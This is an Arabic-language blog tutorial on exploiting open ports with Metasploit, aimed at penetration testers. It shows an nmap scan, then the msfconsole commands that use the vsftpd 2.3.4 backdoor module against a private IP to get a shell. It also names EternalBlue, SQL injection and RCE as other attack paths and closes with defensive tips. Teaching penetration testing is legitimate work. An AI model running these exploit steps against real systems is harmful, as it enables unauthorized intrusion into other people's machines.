الصفحة الرئيسية
Cyber Security
Offensive

كيفية استغلال البورتات المفتوحة باستخدام Metasploit: الدليل الكامل للمبتدئين والمحترفين 2025

Professor Technology

المقدمة

تشكل البورتات المفتوحة (Open Ports) نقطة دخول رئيسية يمكن أن يستغلها المهاجمون لاختراق الأنظمة والتطبيقات. وفي مجال اختبار الاختراق، يُعتبر Metasploit Framework أحد أقوى الأدوات التي تتيح للباحث الأمني استكشاف هذه المنافذ واستخدامها كمسار لاختراق الأجهزة والخوادم.
في هذا المقال، سنشرح كيفية استغلال البورتات المفتوحة خطوة بخطوة باستخدام Metasploit، بدءًا من الاكتشاف وحتى تنفيذ الهجمات العملية.

ما هي البورتات المفتوحة ولماذا تعتبر خطيرة؟

  • البورت (Port): قناة اتصال بين الجهاز والتطبيقات الخارجية.

  • البورت المفتوح: منفذ متاح للاتصالات، مثل (80 HTTP, 21 FTP, 445 SMB).

  • الخطورة: إذا كان البورت يقدم خدمة غير مؤمنة أو بها ثغرة، يمكن للمهاجم استغلالها للوصول غير المصرح به.

دور Metasploit في استغلال البورتات المفتوحة

Metasploit يوفر:

  • مكتبة ضخمة من Modules (Exploits, Payloads, Auxiliary).

  • إمكانية استهداف الخدمات المرتبطة بالبورتات (مثل FTP, SMB, HTTP).

  • بيئة عملية لاختبار الاختراق بشكل آمن ومنهجي.

خطوات استغلال البورتات المفتوحة باستخدام Metasploit

1. اكتشاف البورتات المفتوحة

  • باستخدام أداة مثل Nmap:

nmap -sV 192.168.1.10

مثال مخرجات:

21/tcp   open   ftp
80/tcp   open   http
445/tcp  open   microsoft-ds

2. تحديد الخدمة والثغرة

  • إذا وجدنا مثلًا FTP (بورت 21) يعمل بإصدار قديم (vsFTPd 2.3.4)، يمكن استغلاله مباشرة عبر Metasploit.

3. تشغيل Metasploit واختيار الـ Exploit

msfconsole
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST 192.168.1.10
set RPORT 21

4. اختيار الـ Payload المناسب

set payload cmd/unix/interact

5. تنفيذ الهجوم

exploit

  • بمجرد نجاح الاستغلال، ستحصل على جلسة تفاعلية (Shell) على النظام المستهدف.

أمثلة أخرى شائعة للاستغلال عبر Metasploit

  • بورت 445 (SMB): استغلال ثغرة EternalBlue.

  • بورت 80 (HTTP): استغلال ثغرات SQL Injection أو RCE.

  • بورت 21 (FTP): استغلال ثغرات المصادقة الضعيفة أو الـ Backdoors.

أفضل الممارسات للمدافعين (Blue Team)

  • إغلاق البورتات غير المستخدمة.

  • استخدام Firewall لتقييد الوصول.

  • تحديث الخدمات والتطبيقات بشكل دوري.

  • الاعتماد على Intrusion Detection Systems (IDS) لمراقبة الأنشطة المشبوهة.

الخاتمة

يُعد استغلال البورتات المفتوحة خطوة محورية في اختبار الاختراق (Penetration Testing)، حيث يُظهر مدى خطورة الإعدادات الخاطئة أو الثغرات غير المُعالجة. وباستخدام Metasploit، يمكن للمختبر الأمني محاكاة الهجمات الحقيقية، مما يساعد المؤسسات على تعزيز بنيتها الدفاعية.

حسابنا علي منصة | X
قناتنا علي منصة | Telegram 
شبكة قنوات الفريق 
يمكنك الإنضمام للبوت الذي يضم جميع شروحات وكتب وكورسات الامن السيبراني👇🏻

إرسال تعليق